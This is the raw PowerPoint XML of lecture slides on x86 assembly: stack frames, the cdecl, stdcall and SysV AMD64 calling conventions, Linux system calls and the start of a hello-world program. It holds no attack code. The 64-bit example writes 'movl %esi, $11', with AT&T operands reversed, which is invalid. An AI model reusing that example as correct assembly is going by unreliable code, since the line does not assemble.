              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pop ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>removes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> par</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>      sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>      ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>,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pop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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991249" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="3486150"/>
            <a:ext cx="1447800" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991252" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="4000500"/>
            <a:ext cx="1447800" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991253" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6400800" y="4114800"/>
            <a:ext cx="609600" cy="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991254" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6400800" y="3657600"/>
            <a:ext cx="609600" cy="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991255" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="40005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latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25964945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Calling Conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calling conventions determine: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to pass parameters between caller and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What registers need to be saved </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (used by Linux 32 bit):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller pushes arguments on the stack (right to left)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are caller-saved (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can clobber them)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller cleans up the stack afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cons: Cleanup code needs to be replicated at each invocation location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1185686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Calling Conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (used by the Win32 API):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caller pushes arguments on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cleans up the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cons: no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>variadic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SysV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AMD64 (used by Linux 64 bit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First six integer arguments are passed in registers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, r8, r9)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Except for system calls where r10 is used instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rcx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional arguments are put on the stack right to left</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30613871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Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>32-bit: c = sum(3, 11)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	$11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	$3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	call	sum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>addl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	$8, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>esp</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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, -12(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>64-bit: c = sum(3, 11)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, $11</a:t>
            </a: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edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	call	sum</a:t>
            </a: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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, -4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12316730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System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System calls are usually invoked through libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/x86_64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32627432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(32-bit)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Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>section .data                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> 'Hello world!', 0Ah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>section .text                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>global _start </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>_start:</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4                   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> function</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1                   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>stdout</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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>             	    ; string address</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edx</a:t>
